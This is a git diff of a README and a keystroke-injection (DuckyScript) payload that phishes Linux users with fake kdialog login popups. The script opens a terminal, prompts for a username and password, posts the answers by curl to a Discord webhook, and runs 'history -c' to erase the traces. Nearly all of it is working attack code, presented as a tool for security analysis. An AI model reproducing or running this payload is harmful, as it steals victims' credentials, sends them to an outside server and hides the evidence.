variables
parent
d11423ae10
commit
9d3d60d08b
|
@ -1,5 +1,5 @@
|
||||||
|
|
||||||
# Standard Phishing Payload Using kdialog - Linux ✅
|
# Standard Phishing Payload Using kdialog - Linux
|
||||||
|
|
||||||
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
|
A script used to exfiltrate some input by a popup phishing based on linux systems using kdialog.
|
||||||
|
|
||||||
|
@ -20,13 +20,29 @@ Opens a shell, get the data by a popup, send the input to a Discord webhook (or
|
||||||
### Settings
|
### Settings
|
||||||
|
|
||||||
* Set the Discord webhook
|
* Set the Discord webhook
|
||||||
|
|
||||||
|
```shell
|
||||||
|
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
|
||||||
|
```
|
||||||
|
|
||||||
* Set the payload as you want
|
* Set the payload as you want
|
||||||
|
|
||||||
|
```shell
|
||||||
|
POPUP_TITLE0='Config Popup'
|
||||||
|
POPUP-MESSAGE0='Insert your username and password for go on'
|
||||||
|
POPUP-TITLE1='Insert your Username'
|
||||||
|
POPUP-MESSAGE1='Username'
|
||||||
|
POPUP-TITLE2='Insert your Password'
|
||||||
|
POPUP-MESSAGE2='Password'
|
||||||
|
```
|
||||||
|
|
||||||
### cURL Command
|
### cURL Command
|
||||||
|
|
||||||
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
|
With this payload you can send a post message using cURL shell command line to the webhook or whatever you choose for the exfiltration. You should replace the tag *\<message>* with the user input.
|
||||||
|
|
||||||
- `curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);`
|
```shell
|
||||||
|
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(<message>)\"}" $WEBHOOK_URL);
|
||||||
|
```
|
||||||
|
|
||||||
### kdialog - Popup command
|
### kdialog - Popup command
|
||||||
|
|
||||||
|
@ -60,7 +76,7 @@ This payload is intended to be a working tool for performing cybersecurity analy
|
||||||
|
|
||||||
## Credits
|
## Credits
|
||||||
|
|
||||||
<h2 align="center"> Aleff :octocat: </h2>
|
<h2 align="center">Aleff</h2>
|
||||||
<div align=center>
|
<div align=center>
|
||||||
<table>
|
<table>
|
||||||
<tr>
|
<tr>
|
||||||
|
@ -70,17 +86,11 @@ This payload is intended to be a working tool for performing cybersecurity analy
|
||||||
</a>
|
</a>
|
||||||
<br>Github
|
<br>Github
|
||||||
</td>
|
</td>
|
||||||
<td align="center" width="96">
|
|
||||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
|
||||||
</a>
|
|
||||||
<br>Instagram
|
|
||||||
</td>
|
|
||||||
<td align="center" width="96">
|
<td align="center" width="96">
|
||||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
</a>
|
</a>
|
||||||
<br>Discord
|
<br>LinkedIn
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
|
|
|
@ -1,46 +1,49 @@
|
||||||
* ##########################################################
|
##########################################################
|
||||||
* # |
|
# #
|
||||||
* # Title : Standard Phishing Payload Using kdialog |
|
# Title : Standard Phishing Payload Using kdialog #
|
||||||
* # Author : Aleff |
|
# Author : Aleff #
|
||||||
* # Version : 1.0 |
|
# Version : 1.0 #
|
||||||
* # Category : Phishing |
|
# Category : Phishing #
|
||||||
* # Target : Linux |
|
# Target : GNU/Linux #
|
||||||
* # |
|
# #
|
||||||
* ##########################################################
|
##########################################################
|
||||||
|
|
||||||
* Requirements:
|
ATTACKMODE HID
|
||||||
* - EXFILTRATION:
|
|
||||||
* - Internet Connection
|
|
||||||
* - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
|
|
||||||
* - PHISHING:
|
|
||||||
* - This payload is usable on the Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
|
|
||||||
* - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the * ed code to get a good understanding of what it is all about.
|
|
||||||
|
|
||||||
|
# REQUIREMENTS
|
||||||
|
# - EXFILTRATION:
|
||||||
|
# - Internet Connection
|
||||||
|
# - Discord webhook for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Dropbox, Telegram and so on..)
|
||||||
|
# - PHISHING:
|
||||||
|
# - This payload is usable on the GNU/Linux system where is installed 'kdialog', but you can use whatever you want for simulate the popup with the intent to take the input
|
||||||
|
# - It is important that the popup payload occurs in a single line so that the traces of data collection are eliminated immediately after submission. This is precisely why you can see the * ed code to get a good understanding of what it is all about.
|
||||||
|
|
||||||
QUACK DELAY 1000
|
# VARIABLES
|
||||||
|
# 1) Provide Discord Webhook
|
||||||
|
DISCORD_WEBHOOK='https://discordapp.com/api/webhooks/<webhook_id>/<token>'
|
||||||
|
# You can set the title, the message, the input type and so and so on...
|
||||||
|
POPUP_TITLE0='Config Popup'
|
||||||
|
POPUP-MESSAGE0='Insert your username and password for go on'
|
||||||
|
POPUP-TITLE1='Insert your Username'
|
||||||
|
POPUP-MESSAGE1='Username'
|
||||||
|
POPUP-TITLE2='Insert your Password'
|
||||||
|
POPUP-MESSAGE2='Password'
|
||||||
|
|
||||||
|
QUACK DELAY 1500
|
||||||
QUACK CTRL-ALT t
|
QUACK CTRL-ALT t
|
||||||
QUACK DELAY 2000
|
QUACK DELAY 2000
|
||||||
|
|
||||||
* REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
# A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body.
|
||||||
QUACK STRING WEBHOOK_URL="WEBHOOK"
|
QUACK STRING $(curl -H 'Content-Type: application/json' -X POST -d '{\"content\": \"$(
|
||||||
QUACK ENTER
|
|
||||||
QUACK DELAY 500
|
|
||||||
|
|
||||||
|
# A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here.
|
||||||
|
QUACK STRING kdialog --title $POPUP_TITLE0 --msgbox $POPUP-MESSAGE0;
|
||||||
|
QUACK STRING kdialog --title $POPUP-TITLE1 --inputbox $POPUP-MESSAGE1;
|
||||||
|
QUACK STRING kdialog --title $POPUP-TITLE2 --password $POPUP-MESSAGE2 --default 'password';
|
||||||
|
|
||||||
* A short and efficient cURL command to send an HTTP POST request to a webhook URL with JSON data in the request body.
|
# The end part of the curl payload...
|
||||||
QUACK STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(
|
QUACK STRING )\"}' $DISCORD_WEBHOOK);
|
||||||
|
|
||||||
* A compact command that uses kdialog to display a popup message prompting (into the curl content section) the user to enter their username and password to proceed. You can't acquire multiple input in one popup, so you should use multiple popup, as i wrote here.
|
# history -c will clear the last shell history and the exit command will close the popup at the end of the execution
|
||||||
* You can set the title, the message, the input type and so and so on...
|
|
||||||
QUACK STRING kdialog --title "Popup Title" --msgbox "Insert your username and password for go on";
|
|
||||||
QUACK STRING kdialog --title "Insert your Username" --inputbox "Username";
|
|
||||||
QUACK STRING kdialog --title "Insert your Password" --password "Password" --default "password";
|
|
||||||
|
|
||||||
* The end part of the curl payload...
|
|
||||||
QUACK STRING )\"}" $WEBHOOK_URL);
|
|
||||||
|
|
||||||
* history -c will clear the last shell history and the exit command will close the popup at the end of the execution
|
|
||||||
QUACK STRING history -c; exit;
|
QUACK STRING history -c; exit;
|
||||||
|
|
||||||
* All-In-One doesn't need delay time
|
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
|
|
Loading…
Reference in New Issue